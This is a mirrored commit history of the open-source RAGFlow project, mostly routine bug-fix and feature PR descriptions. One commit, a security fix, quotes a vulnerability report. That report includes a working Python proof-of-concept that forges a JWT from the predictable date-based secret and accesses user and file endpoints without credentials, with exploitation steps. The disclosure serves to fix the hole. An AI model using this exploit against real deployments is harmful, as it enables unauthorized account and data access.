ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-12-19 19:19:12 +00:00

Author	SHA1	Message	Date
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Stephen Hu	1ab0f52832	Fix: The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Stephen Hu	6953ae89c4	Fix: when stream=false, new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in an assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 )

### Description

There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.

### Source - Sink Analysis

Source (User Input): HTTP Authorization header containing attacker-controlled JWT token

Flow Path:
1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142)
2. Token Processing: JWT token extracted from Authorization header
3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. Database Query: `UserService.query()` called with decoded empty access_token
5. Sink: Authentication succeeds, returning first user with empty access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

Exploitation Steps:
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials

Version: 0.19.0

@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The underlying cause is that a change in the selected row keys triggers a test run, though I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
sinopec	243ed4bc35	Feat: Support dynamically adding knowledge bases for retrieval while using the SDK chat API (#7915 ) ### What problem does this PR solve? When using the SDK for chat, you can include the IDs of additional knowledge bases you want to use in the request. This way, you don’t need to repeatedly create new assistants to support various combinations of knowledge bases. This is especially useful when there are many knowledge bases with different content. If users clearly know which knowledge base contains the information they need and select accordingly, the recall accuracy will be greatly improved. Users only need to add an extra field, a kb_ids array, in the HTTP request. The content of this field can be determined by the client fetching the list of knowledge bases and letting the user select from it. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Li Ye <liye@unittec.com>	2025-05-28 19:16:16 +08:00
liu an	ff0e82988f	Fix: patch regex vulnerability in filename handling (#7887 ) ### What problem does this PR solve? [Regular Expression Injection leading to Denial of Service (ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-27 16:35:37 +08:00
Yongteng Lei	453287b06b	Feat: more robust fallbacks for citations (#7801 ) ### What problem does this PR solve? Add more robust fallbacks for citations ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-23 18:24:55 +08:00
Yongteng Lei	42f4d4dbc8	Fix: wrong type hint (#7738 ) ### What problem does this PR solve? Wrong hint type. #7729. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-23 18:21:06 +08:00
Yongteng Lei	e8e2a95165	Refa: more fallbacks for bad citation format (#7710 ) ### What problem does this PR solve? More fallbacks for bad citation format ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] Refactoring	2025-05-19 19:34:05 +08:00
Yongteng Lei	0ebf05440e	Feat: repair corrupted PDF files on upload automatically (#7693 ) ### What problem does this PR solve? Make a best-effort attempt to repair corrupted PDF files automatically on upload. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-19 14:54:06 +08:00
Song Fuchang	a1f06a4fdc	Feat: Support tool calling in Generate component (#7572 ) ### What problem does this PR solve? Hello, our use case requires the LLM agent to invoke some tools, so I made a simple implementation here. This PR does two things: 1. A simple plugin mechanism based on `pluginlib`: This mechanism lives in the `plugin` directory. It will only load plugins from `plugin/embedded_plugins` for now. A sample plugin `bad_calculator.py` is placed in `plugin/embedded_plugins/llm_tools`; it accepts two numbers `a` and `b`, then gives a wrong result `a + b + 100`. In the future, it can load plugins from an external location with little code change. Plugins are divided into different types. The only plugin type supported in this PR is `llm_tools`, which must implement the `LLMToolPlugin` class in the `plugin/llm_tool_plugin.py`. More plugin types can be added in the future. 2. A tool selector in the `Generate` component: Added a tool selector to select one or more tools for LLM: ![image](https://github.com/user-attachments/assets/74a21fdf-9333-4175-991b-43df6524c5dc) And with the `bad_calculator` tool, it produces this result with the `qwen-max` model: ![image](https://github.com/user-attachments/assets/93aff9c4-8550-414a-90a2-1a15a5249d94) ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>	2025-05-16 16:32:19 +08:00
Stephen Hu	2fa8e3309f	Fix: file name length limit mismatch (#7630 ) ### What problem does this PR solve? Close #7597 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-14 10:13:03 +08:00
liu an	6bd7d572ec	Perf: Increase database connection pool size (#7559 ) ### What problem does this PR solve? 1. The MySQL instance is configured with max_connections=1000, but our connection pool was limited to max_connections: 100. This mismatch caused connection pool exhaustion during performance testing. 2. Increase stale_timeout to resolve #6548 ### Type of change - [x] Performance Improvement	2025-05-09 17:52:03 +08:00
Kevin Hu	2ccec93d71	Feat: support cross-lang search. (#7557 ) ### What problem does this PR solve? #7376 #4503 #5710 #7470 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-09 15:32:02 +08:00
Yongteng Lei	b781207752	Feat: KB detail supports document total size (#7546 ) ### What problem does this PR solve? KB detail now returns the total document size. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-09 11:48:54 +08:00
Kevin Hu	9849230a04	Fix: remove deprecated novitaAI. (#7511 ) ### What problem does this PR solve? #7484 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-07 19:36:16 +08:00
Stephen Hu	27ffc0ed74	Feat: Improve 'user_canvan_version' delete and 'document' delete performance (#6553 ) ### What problem does this PR solve? 1. Add delete_by_ids method 2. Add get_doc_ids_by_doc_names 3. Improve user_canvan_version's logic (avoid O(n) db IO) 4. Improve document delete logic (avoid O(n) db IO) ### Type of change - [x] Performance Improvement	2025-05-07 10:55:08 +08:00
Kevin Hu	75b24ba02a	Fix: chat solo issue. (#7479 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-06 19:30:00 +08:00
Yongteng Lei	f29a5de9f5	Fix: filed_map was incorrectly persisted (#7443 ) ### What problem does this PR solve? Fix `filed_map` was incorrectly persisted. #7412 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-06 09:44:38 +08:00
Stephen Hu	2dbcc0a1bf	Fix: Tried to fix the fid mismatch in some cases (#7426 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7407 Based on this context, I think something causes some LLMs to end up with a mismatched fid (a wrong "@xxx" is added), so when the LLM cannot be fetched by fid, falling back to the name alone should be able to fetch it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-30 14:55:21 +08:00
alkscr	ab27609a64	Fix: whole knowledge graph lost after removing any document in the knowledge base (#7151 ) ### What problem does this PR solve? When any document is removed from a knowledge base that uses a knowledge graph, the graph's `removed_kwd` is set to "Y". However, in the function `graphrag.utils.get_gaph`, the `rebuild_graph` method is skipped and `None` is returned directly while `removed_kwd=Y`, so the remaining part of the graph is abandoned (although the old entity data still exists in the db). In addition, the infinity instance actually skips deleting the graph components' `source_id` when a document is removed, which may produce a wrong graph after a rebuild. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-30 09:43:17 +08:00
Yongteng Lei	a4be6c50cf	[BREAKING CHANGE] GET to POST: enhance document list capability (#7349 ) ### What problem does this PR solve? Enhance capability of `list_docs`. Breaking change: change method from `GET` to `POST`. ### Type of change - [x] Refactoring - [x] Enhancement with breaking change	2025-04-27 16:48:27 +08:00
alulala	eead838353	Fix pymysql interface error (#7295 ) ### What problem does this PR solve? Following [Rucongzhang](https://github.com/Rucongzhang)'s [comment](https://github.com/infiniflow/ragflow/pull/7057#issuecomment-2827410047), I added a DB reconnection strategy to the function `update_by_id`	2025-04-25 13:29:47 +08:00
WhiteBear	2c62652ea8	<think> tag is missing. (#7256 ) ### What problem does this PR solve? Some models force thinking, resulting in the absence of the think tag in the returned content ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-24 11:44:10 +08:00
Yongteng Lei	f35ff65c36	[BREAKING CHANGE] GET to POST: enhance kb list capability (#7205 ) ### What problem does this PR solve? Enhance capability of `list_kbs`. Breaking change: change method from `GET` to `POST`. ### Type of change - [x] Refactoring - [x] Enhancement with breaking change	2025-04-22 17:54:12 +08:00
alulala	5d253e0a34	Fix: pymysql.err.InterfaceError: (0, '') during long time streaming chat responses (#6548 ) (#7057 )

### Related Issue: https://github.com/infiniflow/ragflow/issues/6548

### Related PR: https://github.com/infiniflow/ragflow/pull/6861

### Environment:

Commit version: [[48730e0](`48730e00a8`)]

### Bug Description:

Unexpected `pymysql.err.InterfaceError: (0, '')` when using Peewee + PyMySQL + PooledMySQLDatabase after a long-running `chat streamly` operation. This is a common issue with Peewee + PyMySQL + connection pooling: you end up using a connection that was silently closed by the server, but Peewee doesn't realize it's dead.

I found that the error only occurs during longer streaming outputs and is unrelated to the database connection context, so it's likely because:
- The prolonged streaming response caused the database connection to time out
- The original database connection might have been disconnected by the server during the streaming process

### Why This Happens

This error happens even when using `@DB.connection_context()` after the stream is done. After investigation, I found this is caused by MySQL connection pools that appear to be open but are actually dead (expired due to `wait_timeout`).

1. `@DB.connection_context()` (as a decorator or context manager) pulls a connection from the pool.
2. If this connection was idle and expired on the MySQL server (e.g., due to `wait_timeout`), but not closed in Python, it will still be considered “open” (`DB.is_closed() == False`).
3. The real error will occur only when I execute a SQL command (such as `.get_or_none()`), and PyMySQL tries to send it to the server via a broken socket.

### Changes Made:

1. I implemented manual connection checks before executing SQL:

```
try:
    DB.execute_sql("SELECT 1")
except Exception:
    print("Connection dead, reconnecting...")
    DB.close()
    DB.connect()
```

2. Delayed the token count update until after the streaming response is completed to ensure the streaming output isn't interrupted by database operations.

```
total_tokens = 0
for txt in chat_streamly(system, history, gen_conf):
    if isinstance(txt, int):
        total_tokens = txt
        ......
        break
    ......

if total_tokens > 0:
    if not TenantLLMService.increase_usage(self.tenant_id, self.llm_type, txt, self.llm_name):
        logging.error("LLMBundle.chat_streamly can't update token usage for {}/CHAT llm_name: {}, content: {}".format(self.tenant_id, self.llm_name, txt))
```
	2025-04-16 19:15:35 +08:00
Kevin Hu	5af2d57086	Refa. (#7022 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2025-04-15 10:20:33 +08:00
Yongteng Lei	7a34159737	Fix: add fallback for bad citation output (#7014 ) ### What problem does this PR solve? Add fallback for bad citation output. #6948 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-15 09:33:53 +08:00
Yongteng Lei	98670c3755	Fix: KB update_time changed whenever system relaunched (#6959 ) ### What problem does this PR solve? Fix KB update_time changed whenever system relaunched. #6953 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-11 20:10:49 +08:00
Yongteng Lei	dc2c74b249	Feat: add primitive support for function calls (#6840 ) ### What problem does this PR solve? This PR introduces primitive support for function calls, enabling the system to handle basic function call capabilities. However, this feature is currently experimental and not yet enabled for general use, as it is only supported by a subset of models, namely, Qwen and OpenAI models. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-04-08 16:09:03 +08:00
caiming100	a20439bf81	fix: add exception handling for get_by_id method (#6861 ) ### What problem does this PR solve? Fixes #6548 Add exception handling to prevent exceptions from propagating back to the web, which may lead to failure in displaying conversation content. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): Co-authored-by: cm <caiming@sict.ac.cn>	2025-04-08 16:06:57 +08:00
so95	cded812b97	Feat: add OpenAI compatible API for agent (#6329 ) ### What problem does this PR solve? add openai agent _Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._ ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-04-03 16:51:37 +08:00
Kevin Hu	9ecc78feeb	Refa: copywriting refinement. (#6779 ) ### What problem does this PR solve? Close #6762 ### Type of change - [x] Refactoring	2025-04-03 11:38:02 +08:00
Song Fuchang	d4a3e9a7cc	Fix table migration on non-exist-yet indexed columns. (#6666 ) ### What problem does this PR solve? Fix #6334 Hello, I encountered the same problem in #6334. In `api/db/db_models.py`, `init_database_tables` calls `obj.create_table()` unconditionally, before `migrate_db()`. Specifically, the `permission` field of the `user_canvas` table has `index=True`, which causes `peewee` to issue SQL that tries to create the index when the field does not exist yet (the `user_canvas` table already exists), so `psycopg2.errors.UndefinedColumn: column "permission" does not exist` occurred. I've added a check in the code to call `create_table()` only when the table does not exist, and to delegate the migration process to `migrate_db()`. Then another problem occurs: `migrate_db()` actually does nothing because it fails on the first migration! `playhouse` blindly issues DDL statements without clauses like `IF NOT EXISTS`, so it fails... even if the exception is handled with `pass`, the transaction is still rolled back. So I removed the transaction in `migrate_db()` to make it work. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-03-31 11:27:20 +08:00
Zhichang Yu	65a8cd1772	Fix knowledge_graph_kwd on infinity. Close #6476 and #6624 (#6651 ) ### What problem does this PR solve? Fix knowledge_graph_kwd on infinity. Close #6476 and #6624 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-03-28 22:05:40 +08:00
Kevin Hu	ecc9605a32	Fix: team doc deletion issue. (#6589 ) ### What problem does this PR solve? #6557 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-03-27 13:26:38 +08:00
Yongteng Lei	df3890827d	Refa: change LLM chat output from full to delta (incremental) (#6534 ) ### What problem does this PR solve? Change LLM chat output from full to delta (incremental) ### Type of change - [x] Refactoring	2025-03-26 19:33:14 +08:00
Chenzy	735d9dd949	Feat: add "tools" to llm_factories.json (#6552 ) ### What problem does this PR solve? ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Chenzy <chenzy901@gmail.com>	2025-03-26 17:31:18 +08:00
Kevin Hu	bf483fdf02	Fix: describe parameter error. (#6519 ) ### What problem does this PR solve? #6228 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-03-26 09:02:48 +08:00
liwenju0	814a210f5d	Fix: failed to acquire lock exception with retry mechanism for postgres and mysql (#6483 ) Added the with_retry decorator in db_models.py to add a retry mechanism for database operations. Applied the retry mechanism to the lock and unlock methods of the PostgresDatabaseLock and MysqlDatabaseLock classes to enhance the reliability of lock operations. ### What problem does this PR solve? resolve failed to acquire lock exception with retry mechanism ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: wenju.li <wenju.li@deepctr.cn>	2025-03-25 15:09:56 +08:00
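
The retry mechanism described in commit 814a210f5d can be pictured roughly as follows. This is only a minimal sketch, not the code from `db_models.py`: the commit message names a `with_retry` decorator applied to the `lock` and `unlock` methods, but the parameters (`max_retries`, `retry_delay`, `exceptions`), the exponential backoff, and the `FlakyLock` stand-in class are all assumptions made for illustration.

```python
import functools
import time


def with_retry(max_retries=3, retry_delay=0.1, exceptions=(Exception,)):
    """Retry the wrapped callable, doubling the delay after each failed attempt.

    Parameter names and the backoff policy are illustrative assumptions.
    """
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            delay = retry_delay
            for attempt in range(1, max_retries + 1):
                try:
                    return func(*args, **kwargs)
                except exceptions:
                    if attempt == max_retries:
                        raise  # out of attempts: surface the last error
                    time.sleep(delay)
                    delay *= 2
        return wrapper
    return decorator


class FlakyLock:
    """Hypothetical stand-in for a database lock that fails its first two attempts."""

    def __init__(self):
        self.attempts = 0

    @with_retry(max_retries=3, retry_delay=0.01, exceptions=(RuntimeError,))
    def lock(self):
        self.attempts += 1
        if self.attempts < 3:
            raise RuntimeError("failed to acquire lock")
        return True
```

Calling `FlakyLock().lock()` succeeds on the third attempt here. Restricting `exceptions` to the errors that are actually transient keeps the decorator from masking genuine bugs.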

381 Commits
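
Commit b2eed8fed1 in the list above states that progress is only updated if it is valid and not regressive. One way such a guard could look is sketched below. The function name `next_progress` and the assumption that a valid value is a number in the range 0 to 1 are hypothetical; the commit message does not say how validity is defined.

```python
import math


def next_progress(current, proposed):
    """Return the progress value to store, ignoring invalid or regressive updates.

    Assumes (hypothetically) that valid progress is a number in [0, 1].
    """
    # Reject non-numeric values (bool is excluded although it subclasses int).
    if isinstance(proposed, bool) or not isinstance(proposed, (int, float)):
        return current
    # Reject NaN and anything outside the assumed valid range.
    if math.isnan(proposed) or not 0.0 <= proposed <= 1.0:
        return current
    # Never move backwards.
    return max(current, proposed)
```

With this guard, a late or out-of-order status report cannot make a progress bar jump backwards, and a malformed value leaves the stored progress unchanged.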